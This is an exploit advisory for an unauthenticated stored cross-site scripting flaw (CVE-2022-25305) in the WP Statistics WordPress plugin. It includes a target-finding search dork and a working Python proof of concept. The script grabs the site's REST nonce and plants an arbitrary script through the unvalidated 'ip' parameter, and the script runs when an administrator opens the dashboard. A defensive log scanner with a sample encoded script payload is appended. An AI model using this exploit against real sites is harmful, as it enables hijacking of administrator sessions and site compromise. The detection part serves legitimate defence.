| Field | Value |
|---|---|
| Exploit Title | WordPress Plugin WP Statistics >= 13.1.5 - Unauthenticated Stored Cross-Site Scripting |
| Exploit Author | Muhammad Zeeshan (Xib3rR4dAr) |
| Date | February 13, 2022 |
| Plugin Link | WP-Statistics |
| Plugin Active Installations | 600,000+ |
| Version | 13.1.5 (Latest) |
| Tested on | WordPress 5.9 |
| Vulnerable Endpoint | /wp-json/wp-statistics/v2/hit |
| Vulnerable File | /wp-content/plugins/wp-statistics/includes/class-wp-statistics-ip.php and others |
| Vulnerable Parameters | ip |
| Google Dork | inurl:/wp-content/plugins/wp-statistics |
| CVE | CVE-2022-25305 |
unauthenticated_stored_xss_platform_poc.py

```python
import requests, re, json, urllib.parse

wpurl = input('\nWordPress URL: ')
payload = input('\nPayload: ')

# Load the front page once to pick up the REST nonce the plugin embeds for its hit endpoint
wp_session = requests.session()
wp = wp_session.get(wpurl)
wp_nonce = re.search(r'_wpnonce=(.*?)&wp_statistics_hit', wp.text).group(1)

headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"}
payload = urllib.parse.quote_plus(payload)

# The ip parameter is stored without validation and later rendered in the admin dashboard
exploit = f'/wp-json/wp-statistics/v2/hit?_=11&_wpnonce={wp_nonce}&wp_statistics_hit_rest=&browser=Chrome&platform=&version=&referred=&ip={payload}&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=0&search_query&page_uri=/&user_id=0'
exploit_url = wpurl+exploit
print(f'\nSending XSS payload: {exploit_url}')
wp = wp_session.get(exploit_url, headers=headers)
data = wp.json()
print("\nResponse: \n" + json.dumps(data, sort_keys=True, indent=4))
print(f'\nXSS will trigger when admin visits WP Statistics Dashboard at {wpurl}/wp-admin/admin.php?page=wps_overview_page or other pages.')
```
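As an added detection example (not part of the original advisory or of the plugin's code), the check below scans web-server access-log lines for requests to the hit endpoint whose `ip` query parameter is not a literal IPv4/IPv6 address, which is the condition the PoC above relies on. The log lines, client addresses and nonce value are constructed samples.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in combined log format; not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [13/Feb/2022:10:00:01 +0000] "GET /wp-json/wp-statistics/v2/hit?_=1&_wpnonce=NONCE&ip=198.51.100.7&browser=Chrome HTTP/1.1" 200 45 "-" "Mozilla/5.0"
203.0.113.11 - - [13/Feb/2022:10:00:02 +0000] "GET /wp-json/wp-statistics/v2/hit?_=1&_wpnonce=NONCE&ip=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&browser=Chrome HTTP/1.1" 200 45 "-" "Mozilla/5.0"
203.0.113.12 - - [13/Feb/2022:10:00:03 +0000] "GET /wp-json/wp-statistics/v2/hit?_=1&_wpnonce=NONCE&ip=2001%3Adb8%3A%3A1&browser=Chrome HTTP/1.1" 200 45 "-" "Mozilla/5.0"
203.0.113.13 - - [13/Feb/2022:10:00:04 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

HIT_ENDPOINT = "/wp-json/wp-statistics/v2/hit"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def is_valid_ip(value: str) -> bool:
    """True only if value parses as a literal IPv4 or IPv6 address."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def find_suspicious_hits(log_text: str) -> list:
    """Return hit-endpoint requests whose ip parameter is non-empty and not a literal IP."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != HIT_ENDPOINT:
            continue
        # parse_qs percent-decodes the value once, matching what the server receives
        for value in parse_qs(parts.query, keep_blank_values=True).get("ip", []):
            # Assumption: an empty ip value carries no payload, so it is not reported
            if value and not is_valid_ip(value):
                findings.append({"source": line.split()[0], "ip_param": value})
    return findings


if __name__ == "__main__":
    for hit in find_suspicious_hits(SAMPLE_LOG):
        print(f"{hit['source']} sent non-IP value in ip parameter: {hit['ip_param']!r}")
```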